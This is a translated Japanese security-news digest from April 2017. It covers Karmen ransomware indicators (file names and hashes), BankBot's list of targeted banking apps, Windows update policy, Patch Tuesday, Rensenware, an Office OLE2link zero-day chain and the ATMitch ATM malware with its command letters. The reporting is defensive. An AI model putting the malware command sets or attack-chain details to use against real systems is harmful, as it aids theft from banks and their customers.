     Karmen(もしくは、Hidden Tear)身代金要求型マルウェアは、NoMoreRansom.org上で利用可能な無料ツールで削除することができるが、「現時点で、感染したマシンを、この無料復号プログラムで復号する方法は、利用できない」と、研究者は発言している。
     Karmenは、もしもSandbox環境や解析ソフトウェアが犠牲者のコンピュータ上で検出された場合には、復号プログラムを自動的に削除する機能を含む、幾つかの顕著な機能を持っている。Dark Webでの情報によれば、そこには、販売用の5つの売れ残った製品と共に、Karmenの20バージョンがDevBitoxとして知られる特定の転売人によって販売されていると、Recorded Futureは確信しているとされている。
     「サービスと現在行っているメンテナンスの一貫した品質を提供するために、開発者は顧客に対する販売を幾つかの製品に限定するのが一般的である」と、研究者達は発言している。
     現時点で、Karmenの感染チェーンは未知である。また、Karmenマルウェアに感染した犠牲者の数も定かでない。

     【訳注】 以下はBleepingComputerのKarmenに関する記事からの引用

    IOCs:
    File name: joise.exe
    File name: n_karmen.exe
    File name: build.exe
    File MD5: 9c8fc334a1dc660609f30c077431b547
    File MD5: 56b66af869248749b2f445be8f9f4a9d
    File MD5: 521983cb92cc0b424e58aff11ae9380b
    SHA1: dc875c083c5f70e74dc47373a4ce0df6ccd8ae88
    SHA1: f79f6d4dd6058f58b384390f0932f1e4f4d0fecf
    SHA1: 2a3477ea2d09c855591b3d16cfff8733935db50b
     joise.exe(Karmen)のVirusTotalでの検出結果はコチラ。検出率 43/61、解析日時: 2017/04/18 15:29:35(協定世界時。日本時間: 2017/04/19 00:29:35)。


    GoogleはBankBotトロイと戦っている最中、マルウェアはPlay Storeに到達した
    BleepingComputer : News>Security (2017/04/17)
     BankBot Androidバンキング トロイが、Google技術陣の悩みの種になっている。これは、このマルウェアの特定の部分が、Googleのセキュリティ スキャンを回避する才覚を持っており、定期的に公式のPlay Storeに到着しているためである。
     このバンキング トロイの話題は、名前が付けられていないAndroidバンキング トロイのソースコードが地下のオンライン ハッキング フォーラムにリークされた2017年01月に遡る。
     直後に、何者かがこのソースコードを取得し、BankBotとして知られる新しいバンキング トロイを作成し、その月の末までに、ロシアのユーザをターゲットにして使用していた。
     今年2月、BankBotの作者は、他国(英国、オーストリア、ドイツ、トルコのような)の銀行の顧客を標的にするように、このマルウェアのサポートを改悪した。

    BankBotはGoogleセキュリティ スキャンを回避する能力を持っている

     BankBotはリークされたソースコードに基づいているものの、このマルウェアの作者はコードベースを改悪し、Google Bouncerセキュリティ スキャナを欺くに足る偽装能力をこのマルウェアに追加した。
     研究陣は当初、公式のGoogle Play StoreにAndroidアプリケーションをアップロードする、全部で3つの異なるBankBotキャンペーンを検出した。

    先週検出された更なる二つのキャンペーン

     4月に至ってもなお、これらのキャンペーンは依然としてアクティブである。BankBotは最初に、ロシアのサイバーセキュリティ企業Dr.Webによって検出され、一連のキャンペーンはESETによって検出された。オランダの企業Securifyもまた、二つの新しいBankBotキャンペーンを同定した(二つのアプリケーションがBouncerをバイパスしPlay Storeに到達する)。
     これらのアプリケーションの一つ目は、Funny Videos 2017と名付けられていたものであり、先週、削除されたが、それまでに1000から5000ダウンロードされていた。
     二つ目のアプリケーション(HappyTimes Videos)は、イースター(【訳注】 復活祭、今年は4月16日)の間に発見され、この記事がリリースされる前に削除された。

    先週検出された更なる二つのキャンペーン

     セキュリティの専門家によると、二つのアプリケーションは、BankBotトロイの最新のバージョンに感染させられていた。この名前が仄めかしているように、BankBotはAndroidバンキング トロイである。殆どのAndroidバンキング トロイと同様に、BankBotは、そのユーザの正当なバンキング アプリケーションの上にインチキのログイン ウィンドウを表示する。


    BankBotによって正当なログインウィンドウに重ねて表示されるインチキのログインウィンドウの一部

     実際には、BankBotはバンキング アプリケーション以外の機能も持っているのでログイン認証を盗むことができる。今迄のバージョンは、Facebook, Viber, Youtube, WhatsApp, Uber, Snapchat, WeChat, IMO, Instagram, Twitter, Google Play Storeのようなアプリケーションに関するログインの詳細を盗むことが可能になっていた。
     更に、BankBotは身代金要求型マルウェアのような挙動をして、ユーザのデバイスをロックすることができ、また、二要素認証操作をバイパスする能力を持っているためにSMSメッセージをインターセプトすることもできた。
     以下は、先週明るみに出たBankBotバージョンがターゲットとして設定していた424の正当なバンキング アプリケーションのリストである。
     このリスト中のコードは、通常Google Play Storeアプリケーションのページの末尾に存在している(【訳注】 下の画像の赤枠部分)。あなたは、自身のモバイル バンキング アプリケーションに関してGoogle Play Storeにアクセスし、そのプログラムが以下のリストに存在しているか否かを確認することができる。


    Play Store URLコード(画像をクリックすると拡大されます)

    aib.ibank.android
    aib.ibank.android.tablet
    ar.bapro
    ar.bapro.tablet
    ar.com.redlink.ciudad
    ar.com.santander.rio.mbanking
    ar.macro
    ar.nbad.emobile.android.mobilebank
    at.bawag.mbanking
    at.bawag.tablet
    at.easybank.mbanking
    at.erstebank.george
    at.ing.diba.client.onlinebanking
    at.oberbank.mbanking
    at.psa.app.bawag
    at.spardat.netbanking
    at.volksbank.volksbankmobile
    au.com.amp.myportfolio.android
    au.com.bankwest.mobile
    au.com.heritage.app
    au.com.ingdirect.android
    au.com.macquarie.banking
    au.com.mebank.banking
    au.com.nab.mobile
    au.com.nab.mobile.android.nabconnect
    au.com.pnbank.android
    au.com.suncorp.SuncorpBank
    biz.mobinex.android.apps.cep_sifrematik
    cedacri.mobile.bank.asti
    cedacri.mobile.bank.bppb
    cedacri.mobile.bank.desio.brianza
    ch.raiffeisen.android
    ch.raiffeisen.phototan
    co.uk.Nationwide.Mobile
    com.AlinmaSoftToken
    com.BOQSecure
    com.BankAlBilad
    com.CredemMobile
    com.EurobankEFG
    com.IngDirectAndroid
    com.QIIB
    com.SifrebazCep
    com.VBSmartPhoneApp
    com.a2a.android.burgan
    com.abnamro.grip
    com.abnamro.nl.mobile.payments
    com.abnamro.nl.mobile.wallet
    com.adcb.bank
    com.adib.mbs
    com.akbank.android.apps.akbank_direkt
    com.akbank.android.apps.akbank_direkt_tablet
    com.akbank.softotp
    com.alahli.mobile.android
    com.alinma.smartphone
    com.alpha.pass
    com.amanalrajhi
    com.anz.android.gomoney
    com.appfactory.tmb
    com.arabbank.arabimobile
    com.axabanque.fr
    com.axis.cbk
    com.bancamarch.bancamovil
    com.bancomer.mbanking
    com.bancsabadell.wallet
    com.bankaustria.android.olb
    com.bankia.wallet
    com.bankinter.launcher
    com.bankinter.portugal.bmb
    com.bankofireland.mobilebanking
    com.bankofqueensland.boq
    com.bankofqueensland.boqtablet
    com.barclays.android.barclaysmobilebanking
    com.barclays.bca
    com.barclays.portugal.ui
    com.bawagpsk.securityapp
    com.bbva.bbvacontigo
    com.bbva.bbvawalletmx
    com.bbva.netcash
    com.bbva.netcashar
    com.bbva.nxt_tablet
    com.bendigobank.mobile
    com.binckbank.evolution
    com.bnpp.easybanking
    com.boi.tablet365
    com.boubyanapp.boubyan.bank
    com.boursorama.android.clients
    com.bsffm
    com.business_token
    com.caisse.epargne.android.tablette
    com.caisseepargne.android.mobilebanking
    com.cajamar.GCCajamar
    com.cajasur.android
    com.carrefour.bank
    com.cba.android.netbank
    com.cba.shiraz
    com.cbd.mobile
    com.cbq.CBMobile
    com.cic_prod.bad
    com.cic_prod_tablet.bad
    com.citi.regional.argentina
    com.citibank.mobile.au
    com.citibank.mobile.citiuaePAT
    com.cleverlance.csas.servis24
    com.cm_prod.bad
    com.cm_prod_tablet.bad
    com.comarch.mobile
    com.comarch.mobile.banking.bnpparibas
    com.comarch.security.mobilebanking
    com.comdirect.phototan
    com.commbank.netbank
    com.commerzbank.kontostand
    com.commerzbank.photoTAN
    com.cs.vasco
    com.csg.cs.dnmb
    com.db.mm.deutschebank
    com.db.mobilebanking
    com.db.pbc.miabanca
    com.db.pbc.mibanco
    com.db.pbc.phototan.db
    com.db.tabbanking
    com.defencebank.locationapp
    com.dib.app
    com.ducont.meethaq
    com.ducont.muscatbank
    com.entersekt.authapp.dkb
    com.ezmcom.softtoken.adcb
    com.finansbank.mobile.cepsube
    com.finanteq.finance.ca
    com.firstdirect.bankingonthego
    com.fpe.comptenickel
    com.fullsix.android.labanquepostale.accountaccess
    com.fusion.banking
    com.fusion.beyondbank
    com.garanti.bonusapp
    com.garanti.cepbank
    com.garanti.cepsubesi
    com.getingroup.mobilebanking
    com.gieseckedevrient.android.wallet.rabo
    com.google.android.1gm1
    com.greater.Greater
    com.grppl.android.shell.BOS
    com.grppl.android.shell.CMBlloydsTSB73
    com.grppl.android.shell.halifax
    com.hipotecario.mobile
    com.hsbc.hsbcukcmb
    com.htsu.hsbcpersonalbanking
    com.icbc.mobile.abroadARG
    com.icomvision.bsc.mobilebank
    com.ideaknow.ing
    com.ie.capitalone.uk
    com.iflex.fcat.mobile.android
    com.imb.banking2
    com.ing.diba.mbbr2
    com.ing.diba.smartsecure2
    com.ing.mobile
    com.ing.mobilepayments
    com.ingbanktr.cuzdan
    com.ingbanktr.ingmobil
    com.intertech.mobilemoneytransfer.activity
    com.isis_papyrus.raiffeisen_pay_eyewdg
    com.kbc.mobilebanking
    com.kfh.kfhonline
    com.kutxabank.android
    com.kutxabank.appatxas
    com.kuveytturk.mobil
    com.latuabanca_tabperandroid
    com.latuabancaperandroid
    com.latuabancaperandroid.ispb
    com.latuabancaperandroid.pg
    com.lcl.application.tablette
    com.lloydsbank.businessmobile
    com.magiclick.odeabank
    com.mbanking.nbb
    com.mediaengine.allianzbank
    com.mediolanum.android.bst
    com.mediolanum.android.fullbanca
    com.mediolanum.android.wallet
    com.mobileloft.alpha.droid
    com.mobilenik.bsf
    com.mobilenik.ubika.bna
    com.monitise.client.android.clydesdale
    com.monitise.client.android.yorkshire
    com.monitise.coop
    com.mosync.app_Banco_Galicia
    com.nbo.ar
    com.nbo.mobs
    com.ncb.softtoken
    com.nearform.ptsb
    com.niobiumlabs.eurobank.activity
    com.ofss.fcdb.mobile.android.phone.bahl.launcher
    com.opentecheng.android.webank
    com.paypal.android.p2pmobile
    com.paypal.here
    com.posteitaliane.postemobilestore
    com.pozitron.anb
    com.pozitron.ingkurumsal
    com.pozitron.iscep
    com.pozitron.vakifbank
    com.rak
    com.rbs.mobile.android.natwest
    com.rbs.mobile.android.natwestbandc
    com.rbs.mobile.android.rbsbandc
    com.rbs.mobile.android.rbsm
    com.rbs.mobile.android.ubn
    com.rev.mobilebanking.westpac
    com.rsi
    com.rsi.ruralviatablet
    com.s4m
    com.sa.baj.aljazirasmart
    com.sabb
    com.samba.mb
    com.scb.ae.bmw
    com.scrignosa
    com.sella.BancaSella
    com.softtech.isbankasi
    com.solidpass.main.bsf
    com.starfinanz.mobile.android.dkbpushtan
    com.starfinanz.mobile.android.pushtan
    com.starfinanz.smob.android.sbanking
    com.starfinanz.smob.android.sbanking.tablet
    com.starfinanz.smob.android.sfinanzstatus
    com.starfinanz.smob.android.sfinanzstatus.tablet
    com.supervielle.mBanking
    com.swmind.vcc.android.bzwbk_mobile.app
    com.targo_prod.bad
    com.targo_prod_tablet.bad
    com.teb
    com.tecnocom.cajalaboral
    com.tescobank.mobile
    com.tmob.denizbank
    com.tmobtech.halkbank
    com.ubank.internetbanking
    com.ubs.swidK2Y.android
    com.ubs.swidKXJ.android
    com.unicajaTabletas
    com.unicredit
    com.vakifbank.mobile
    com.vipera.ts.starter.FGB
    com.vipera.ts.starter.MashreqAE
    com.vipera.ts.starter.MashreqQA
    com.vipera.ts.starter.QNB
    com.ykb.android
    com.ykb.android.db
    com.ykb.android.mobilonay
    com.ykb.androidtablet
    com.ykb.avm
    com.zentity.ing
    com.ziraat.ziraatmobil
    coop.bancocredicoop.bancamobile
    cz.airbank.android
    cz.csas.app.mujstav
    cz.csas.business24
    cz.csob.smartbanking
    cz.csob.smartklic
    cz.kb.mba.business
    cz.mbank
    cz.moneta.smartbanka
    cz.rb.app.smartphonebanking
    cz.sberbankcz
    cz.ulikeit.fio
    de.adesso.mobile.android.gadfints
    de.comdirect
    de.comdirect.android
    de.commerzbanking.mobil
    de.consorsbank
    de.dkb.portalapp
    de.dzbank.kartenregie
    de.fgi.ms.securesign
    de.fgi.ms.vrsecurecard
    de.fiducia.smartphone.android.banking.bb
    de.fiducia.smartphone.android.banking.psd
    de.fiducia.smartphone.android.banking.vr
    de.fiducia.smartphone.android.securego.vr
    de.ing_diba.kontostand
    de.postbank.finanzassistent
    de.sdvrz.ihb.mobile.app
    de.sdvrz.ihb.mobile.secureapp.netbank.produktion
    de.sdvrz.ihb.mobile.secureapp.sparda.produktion
    enbd.mobilebanking
    enbd.mobilebanking.ksamobile
    enbd.mobilebanking.smartbusiness
    es.bancopopular.nbmpopular
    es.bancopopular.nbmpopulartablet
    es.bancosantander.apps
    es.bancosantander.empresas
    es.bancosantander.wallet
    es.bmn.bmnapp2
    es.bmn.cajagranadaapp2
    es.bmn.cajamurciaapp2
    es.bmn.sanostraapp2
    es.caixagalicia.activamovil
    es.caixageral.caixageralapp
    es.ccm.ccmapp
    es.cm.android
    es.cm.android.tablet
    es.connectis.mobile.alrajhi
    es.evobanco.bancamovil
    es.lacaixa.hceicon2
    es.lacaixa.mobile.android.newwapicon
    es.liberbank.cajasturapp
    es.redsys.walletmb.app.kutxa.pro
    es.redsys.walletmb.app.laboralkutxa.pro
    es.santander.money
    es.univia.unicajamovil
    eu.eleader.mobilebanking.abk
    eu.eleader.mobilebanking.bre
    eu.eleader.mobilebanking.nbk
    eu.eleader.mobilebanking.pekao
    eu.eleader.mobilebanking.pekao.firm
    eu.eleader.mobilebanking.raiffeisen
    eu.inmite.prj.kb.mobilbank
    finansbank.enpara
    fr.banquepopulaire.cyberplus
    fr.banquepopulaire.cyberplus.pro
    fr.banquepopulaire.cyberplustablet
    fr.bred.fr
    fr.creditagricole.androidapp
    fr.creditagricole.macarteca
    fr.lcl.android.customerarea
    fr.lcl.android.entreprise
    ftb.ibank.android
    gr.winbank.mobile
    hr.asseco.android.jimba.mUCI.cz
    hr.asseco.android.jimba.mUCI.cz.tablet
    hr.asseco.android.mtoken.credem.credemprod
    hr.asseco.android.mtoken.pekao
    it.bcc.iccrea.mycartabcc
    it.bnl.androidTablet
    it.bnl.apps.banking
    it.bpm.bpmandroid
    it.bpm.ptbandroid
    it.carige
    it.cividale.bpconline
    it.copergmps.rt.pf.android.sp.bmps
    it.copergmps.rt.pf.android.tab.ui.bmps
    it.creval.bancaperta
    it.elfisystems.ncbc.droid.tablet
    it.elfisystems.ncbc.mobile
    it.gruppobper.ams.android.bper
    it.ingdirect.app
    it.nogood.container
    it.popso.SCRIGNOapp
    it.relaxbanking
    it.reply.up.mobile.android
    it.secservizi.mobile.atime
    it.secservizi.mobile.atime.bpaa
    it.secservizi.mobile.atime.bpvi
    it.ubi.digitalcode
    it.ubiss.mpay
    it.volksbank.android
    mbanking.NBG
    mobi.societegenerale.mobile.lappli
    mobi.societegenerale.mobile.lapplipro
    mobile.alphabank.myAlphaWallet_android
    mobile.santander.de
    net.atos.alrajhi.mobilekw
    net.bnpparibas.mescomptes
    net.inverline.bancosabadell.officelocator.android
    nl.asnbank.asnbankieren
    nl.rabomobiel
    nl.regiobank.regiobankieren
    nl.snsbank.snsbankieren
    nl.snsbank.snshelp
    nz.co.amp.myportfolio.android
    nz.co.anz.android.mobilebanking
    nz.co.asb.asbmobile
    nz.co.asb.mobilebusiness
    nz.co.bnz.droidbanking
    nz.co.bnz.droidbusinessbanking
    nz.co.cooperativebank
    nz.co.kiwibank.mobile
    nz.co.westpac
    org.banelco
    org.banelco.ibay
    org.banelco.qlms
    org.banelco.rbts
    org.banelco.sdmr
    org.banking.bom.businessconnect
    org.banking.bsa.businessconnect
    org.banking.stg.businessconnect
    org.banksa.bank
    org.bom.bank
    org.microemu.android.model.common.VTUserApplicationLIN☒
    org.microemu.android.model.common.VTUserApplicationLIN☒
    org.stgeorge.bank
    org.westpac.bank
    org.westpac.col
    pl.aliorbank.kantorwalutowy
    pl.bzwbk.bzwbk24
    pl.bzwbk.ibiznes24
    pl.bzwbk.mobile.tab.bzwbk24
    pl.com.suntech.mobileconnect
    pl.eurobank
    pl.ing.ingmobile
    pl.ipko.mobile
    pl.mbank
    pl.millennium.corpApp
    pl.pkobp.iko
    posteitaliane.posteapp.appbpol
    pt.BancoPopular.android.app
    pt.bancobest.android.mobilebanking
    pt.bancobpi.mobile.autorizacoesempresas
    pt.bancobpi.mobile.fiabilizacao
    pt.bes.bestablet
    pt.cgd.caixadirecta
    pt.cgd.caixadirectaempresas
    pt.novobanco.nbapp
    pt.santandertotta.mobileparticulares
    pt.sibs.android.mbway
    riyad.bankingapp.android
    rm.beleggen
    tr.com.sekerbilisim.mbank
    tsb.mobilebanking
    uk.co.bankofscotland.businessbank
    uk.co.metrobankonline.personal.mobile
    uk.co.northernbank.android.tribank
    uk.co.santander.businessUK.bb
    uk.co.santander.santanderUK
    uk.co.tsb.mobilebank
    wit.android.bcpBankingApp.activoBank
    wit.android.bcpBankingApp.millennium
    wit.android.bcpBankingApp.millenniumPL
    www.ingdirect.nativeframe
    Com.android.vendin?(先頭のCはCにセディーユ)


    Microsoftは、Windows 7 と 8.1 が稼働している新しいCPU搭載モデルに対するアップデートを停止している
    BleepingComputer : News>Security (2017/04/14)
     今月から、Microsoftは、Intel第7世代(Kaby Lake)、AMD第7世代(Bistol Ridge)のような最新のプロセッサ モデル上で稼働しているWindows 7 と 8.1 へのアップデートの配布を停止していた。
     Microsoftは、新しいCPUモデルへのサポートは、最新のOSであるWindows 10に限定され、End-Of-Lifeの過程にあるWindows 7 と 8.1 はサポートされないと発言している。

    Microsoftは昨年PC所有者に警告していた

     Microsoftは、2016年01月03月08月に、その意図をアナウンスしていた。Microsoftはこの変更に関して特定の期限を決してアナウンスしなかった。そして、Microsfotがサポートトピックを2017年03月にオンラインに上げた場合でさえ、この期限はアナウンスされなかったので、今月の定例パッチは、多くのPC所有者に驚きを与えることになった。
     今月、新しいCPUでWindows 7 と 8.1 を稼働しているユーザへのアップデートは、以下の警告が表示される。
    Your PC uses a processor that is designed for the latest version of Windows. Because the processor is not supported together with the Windows version that you are currently using, your system will miss the important security updates.

    あなたのPCはWindowsの最新バージョン用に設計されたプロセッサを使用している。このプロセッサと、あなたが現在使用中のWindowsバージョンとの組み合わせはサポートされない。あなたのシステムは重要なセキュリティ アップデートを取得できない。

    【訳注】 Microsoftの日本語サイトに、この部分の和訳を見つけることができませんでしたので、対訳しておきます。

     今月のアップデートから、Windows 7 と 8.1 ユーザはWindowsアップデートをスキャンしたりダウンロードしようとした時、以下のエラーの一つを受け取るだろう。

    サポートされていないハードウェア
    お使いの PC はこのバージョンの Windows でサポートされていないプロセッサを使用しています。更新プログラムは利用できません。(Microsoft日本語サイトより引用)

    もしくは、

    新しい更新プログラムを検索できませんでした
    このコンピューターで利用できる新しい更新プログラムを確認中にエラーが発生しました。
    エラー:
    コード 80240037 Windows Update で不明なエラーが発生しました。(Microsoft日本語サイトより引用)

    以下の第7世代のCPUモデルの所有者が影響を受けることが知られている。

      ・ Intel 第 7 世代プロセッサ(Intel Core ix 7xxx)
      ・ AMD “Bristol Ridge/Ryzem/Zen”
      ・ Qualcomm “8996"

     このことは、Microsoftが、Windows 7 と Windows 8.1 に関して全ての古いCPUモデルをサポートすることを意味していない。これは、Micorosoftが現在、Skylakeとして知られるIntel第6世代プロセッサをサポートする予定の16のOEMベンダ(リンクは日本語サイトに変更しています)をリストしているからである。
     未だWindows 7 と 8.1 を稼働している新しいCPUモデルの所有者に対して、Microsoftは、Windows 10 へのアップデートを推奨している。


    AdobeとMicrosoftから緊急のセキュリティ アップデート
    Krebs On Security : Blog (2017/04/12)
     AdobeとMicrosoftは夫々、彼等の製品中の大量のセキュリティ フローを修正するためのアップデートを火曜日にリリースした。Adobeは、Flash Player、Acrobat、Reader中の数ダースのセキュリティ ホールをパッチした。Microsoftは、Windows及び関連ソフトウェア中の数ダースの脆弱性を解決するための修正をリリースした。
     Windowsユーザと、取り分け多くのWindowsマシンに管理責任のある人々にとって、今月の最大の変更は、Microsoftがパッチ用の個別のセキュリティ ブレティンを単一の「セキュリティ更新プログラムガイド」に置き換えたことである。
     この変更は、Microsoftにより、特定のアップデートを選択的にダウンロードすることからホームユーザを締め出すために、一つの大きなパッチの塊として全ての定例アップデートをリリースするという変更の余波に密接に関連している。
     顧客は、この強化されたガイドを求めていたとするMicrosoftの主張にも拘わらず、多くのユーザは、新しいフォーマットに多分ウンザリしているだろう(今迄の規定の下より、より多くのクリックと検索を要求されるようである)。どのような場合であれ、Microsoftは、何が変更されたのか、人々が新しい取り決めの下で何を期待できるのかを説明するために、FAQをリリースしてきた。
     私が数えたところでは、今週のMicrosoftのパッチは、46のセキュリティ上の脆弱性(Internet Explorer, Microsoft Edge, Windows, Office, Visual Studio for Mac, .NET Framework, Silverlight, Adobe Flash Player中のフローを含む)を解決している。
     今月Microsoftによって修正された緊急のバグの少くとも二つは、既に積極的な攻撃中で悪用されている(Dridexバンキング トロイを拡散するように設計された攻撃で表面化したMicrosoft Word中の弱点を含む)。
     最後に、依然としてWindows Vistaを稼働させている全てのMicrosoftユーザへの注意喚起: 今月は、Vistaが受け取ることのできるセキュリティアップデートの最終月である。Vistaが最初に消費者に対してリリースされたのは、10年以上前の2007年01月である。あなたが未だVistaを使い続けているのであれば、より最先端のOS(Windowsである必要はない。【訳注】 Linuxという名前を聞いただけで嫌われますが、2004年頃のマシンでもLinuxはかなり軽快に動作します。インターフェースに慣れるのに多少時間を要する方もおられますが、ほぼWindows同等の感覚で作業できます。人気のUbuntu系列でLubunt、Xubuntu、Bean等を試されることをお勧めします。BeanはDefaultでWindowsアプリケーションのエミュレータであるWineを搭載しています。なお、Linux側からWindowsのファイルは操作可能です。)を試す時宜かもしれない。
    Microsoftの定例のパッチの実行に慣れているように、Adobeも独自の一団のセキュリティパッチをリリースした。いつものFlash Playerの緊急のアップデートは、少なくとも7つのフローを修正している。新しいバージョンは、Windows、Mac、Linux用は、v. 25.0.0.148 である。
     此処の常連であれば既に知っていると思うが、私は膨大なセキュリティ ホールの存在からFlashを嫌っている。ドライブ−バイ マルウェア攻撃のお気に入りのターゲットであり、最早、インストールされたり、あるいは、ずっとONにしておく必然性は本当に存在しない。
     それ故、あなたがFlashをインストールしているのであれば、可能な限り早急にFlashをアップデートするか、妨げるか、あるいは、削除すべきである。あなたのブラウザが、Flashのどのバージョンをインストールしているのか確認するには、このページをチェックしなさい。
     最も賢明なオプションは多分、今回限りで、このプログラムを見捨てることであり、このプロセスであなたのシステムのセキュリティを顕著に増加させることができる。それ自体をブラウザに結合する大変強力でバグだらけのプログラムであるFlashは、攻撃者とマルウェアのお気に入りのターゲットである。Flashを妨害したり、Flash無しで実行したりする方法(根本的な解決策には僅かに届かない)についての幾つかのアイデアに関しては、A Month Without Adobe Flash Playerをチェックしなさい。
     あなたがFlashを維持し続けることを選択するなら、今日アップデートしなさい。Flashの最新のバージョンは、Flashホームページから利用可能である。Internet Explorer以外のブラウザでWebをブラウズしているWindowsユーザは、このパッチを夫々のブラウザで適用する必要がある。IEで一回、使用している他のブラウザでも夫々。
     ChromeとIEは、ブラウザを再起動することで最新のFlashバージョンを自動インストールするはずである(ユーザはアップデートを手動でチェックし、最新のFlashバージョンを入手するためにブラウザを再起動する必要があるかもしれない)。Chromeユーザは、この最新のバージョンをインストールもしくは、自動ダウンロードするために、このブラウザを再起動する必要があるかもしれない。疑わしい時は、URLバーの右側にある縦に三つのドットが並んでいるアイコンをクリックし、「ヘルプ」、次に、「Chromeについて」を選択しなさい。そこに利用可能なアップデートがあれば、Chromeは次回、最新バージョンをインストールするはずである。
     Adobeは、Photoshop、Adobe Reader、Acrobatソフトウェア パッケージ用のセキュリティ フィックスもリリースしている。Reader / Acrobatアップデートは、これらの製品中の大変多くの47のセキュリティ ホールを解決している。あなたが、これらのプログラムの何れかをインストールしているのであれば、アップデートの時間を取りなさい。
     最後の2行は省略します。

     

    アニメ ファンをターゲットにしたRensenwareは、復号に熱狂的な挑戦を要求する
    Bitdefender : Hot For Security (2017/04/11)
     アニメを愛する人は、ダウンロードするものに注意しなさい。新しいタイプの身代金要求型マルウェアが、悪意からではなくオンラインにリリースされていた。
     ファイルを復号するために、Rensenwareは、法外な金額を要求する代わりに、弾幕型シューティングゲームTouhou Seirensen(東方星蓮船)で遊ぶことを要求する。そして、このマルウェアの製作者でさえ自分のコンピュータが感染した時に、クリアすることができないであろう2億ポイント("lunatic"レベル)という常軌を逸したスコアに到達することだけを要求してくる。
     この開発者は、Typle Eraserと名乗る韓国の学生である。事件発覚以来オンラインに謝罪をリリースした作者によると、Rensenwareは単に面白がって開発しただけであり、悪意はなかった、ということである。この身代金要求型マルウェアは、GitHubにポストされ数時間のうちに拡散した。感染の後、この学生は復号ソフトをリリースしている。
     「私は、冗談でこれを作った、そして、東方Projectシリーズが好きな人達と笑いたかっただけだ。私はコンパイルされたバイナリを除き、Web上でソースコードを配布した。」 この謝罪は続けて、「しかしながら、配布の時点で、悲劇は始まっていた。一部の人々が私を非難した。尤もなことだ。私は明らかな間違いを犯した。この謝罪が、皆さんにとって十分なものか否か分からない。十分なものでなければ、私はまた謝罪する。害を及ぼそうとしたわけではない。私は、皆さんが、このことを理解してくれることを希望する。」
     当初の計画が、害を発生させることを意図せず、ソースコードが削除されていようとも、コードの一部は多分、オンラインの何処かのアーカイブに存在している。つまるところ、ハッカーは、このコードを腐敗したものへ変更することを考えるだろう。


    新しいOfficeへの0−Day攻撃が検出された
    BleepingComputer : News>Security (2017/04/08)
     サイバーセキュリティ企業McAfeeFireEyeが、インターネット上の新たなMicrosoft Officeへの0-Day攻撃を公開した。この0−Dayの脆弱性は、攻撃者がターゲットのマシンにコッソリとコードを実行しマルウェアをインストールすることを可能にするものである。
     Microsoftは、この0-Dayを認識しているが、三日後にスケジュールされている次回のパッチの火曜日(【訳注】 毎月第二火曜日のMicrosoftの定例パッチの日)までにパッチが配布されることは粗ありえないだろう。
     この0-Dayの存在を公開したMcAfeeの研究者は、彼等が今年1月以降、この未パッチの脆弱性を悪用した攻撃を検出していたと発言している。

    Office保護ビューは、この攻撃を阻止する

     この0-Dayへの攻撃は単純なシナリオに従い、敵が犠牲者にMicrosoft WordドキュメントをeMailすることで始まる。このWordドキュメントは、ブービートラップされたOLE2linkオブジェクトを含んでいる。
     犠牲者が、ファイルを開く時、Office保護ビュー(リンクは日本語サイトに変更してあります)を使用していたなら、この脆弱性攻撃は無効になり、絶対に実行されない。ユーザが保護ビューを無効にしていた場合には、この脆弱性攻撃は自動的に実行され、RTFを装ったHTA(HTMLアプリケーション、【訳注】 外観はHTML、内部処理はVBScriptあるいはJavaScriptで実装する(It Proより))ファイルをダウンロードする場所から、攻撃者のサーバーに対してHTTPリクエストを実行する。
     このHTAファイルは、自動的に実行され、ユーザのマシンを乗っ取るために脆弱性攻撃コードを起動し、兵器化されたWordファイルを終了し、代わりに、囮のドキュメントを表示する。
     FireEyeによると、「オリジナルのwinword.exeプロセスは、OLE2linkによって生成されたユーザ プロンプトを隠すために終了させられる。」
     この攻撃は、Wordドキュメントを使用しているが、OLE2linkオブジェクトは、ExelやPowerPointのような他のOfficeパッケージソフトにも埋め込むこともできる。

    この0−Dayは、全てのWindowsとOfficeのバージョンに影響を与える

     McAfeeの専門家は、この脆弱性が、全てのWindowsオペレーティング システム上の全ての現在のOfficeバージョンに影響を与えると発言している。
     この攻撃ルーチンは、埋込み型マクロに依存していない。あなたがマクロで味付けをしてあるドキュメントに関する警告を見ていなくても、それはそのドキュメントが安全であることを意味していない。
     McAfeeもFireEyeも、この0-Dayを介してインストールされるマルウェアの詳細を提供していないが、0-Dayは、通常、国が支援する攻撃者の武器庫で発見される。


    ATMから現金を吐き出させる自己削除型マルウェア
    BleepingComputer : News>Security (2017/04/04)
     セキュリティ研究者が、今日最も洗練されたATM強盗の一つを明らかにした。これは、ファイルレス マルウェア(fileless malware)と、現金を吐き出させたら次に、自分自身を削除するATMマルウェアを使用して銀行のネットワークをハッキングすることを専門とするサイバー犯罪者グループに関連している。
     これらのATM強盗は、数年に渡り積極的に活動しているハッカー グループの仕事である。2016年に始まった、直近の活動では、このグループは、正当なWindowsアプリケーションと、少なくとも40ヶ国の政府機関や銀行をハッキングするためのファイルレス マルウェアを使用するように切り替えている。
     これらの攻撃は、感染したサーバ上に殆ど足跡を残すことのないステルス技術を使用しているため、犯罪者が操っているものを検出することができなかった。それであるにも拘わらず、彼等は、ハッカーが感染したシステムからデータ(ハッカーはどのようなデータなのか知らなかったが)を盗んだと疑った。

    ハッカーはATMシステムの制御を取得した銀行を晒した

     これらの攻撃に関する更なる手掛かりが、やっと最近になって明るみに出た。Kaspersky Labのセキュリティ研究者(今年二月の第一次攻撃を同定した人々)は、彼等が銀行をハッキングした目的の一部を明らかにしたと確信している。


    画像をクリックすると拡大表示されます。

     St. Maarten(【訳注】 セントマーチン島、カリブ海にある島)で近頃開催されたSecurity Analyst Summit (SAS)でのプレゼンで、Kaspersky Labの研究者は、犯罪者が、様々な悪用(彼等が正当なWindowsツールとシステムの程近くに彼等のアクセスを拡大するためのPowerShellマルウェアを使用する場所)を使用して様々な銀行のネットワークに侵入したと発言している。
     彼等のターゲットは、銀行のATMネットワークを管理するシステムであった。ハッカーは、RDP(Remote Desktop Protocol、リモート デスクトップ プロトコル)を介してATMに接続するために、このシステムのリモート管理機能を使用した。
     次に、彼等はこれらのマシン上に新種のATMマルウェア(これは、Kaspersky Labの専門家によってATMitchと名付けられた)を転送しインストールした。

    ATMitchマルウェアはATMに現金を吐き出させる

     このマルウェアは命令用の command.txt ローカルファイルを読むことによって動作する。命令は、command.txt ファイルの内部に存在している一文字の単純なものである。

    'O' - Open dispenser
    'D' - Dispense
    'I' - Init XFS
    'U' - Unlock XFS
    'S' - Setup
    'E' - Exit
    'G' - Get Dispenser id
    'L' - Set Dispenser id
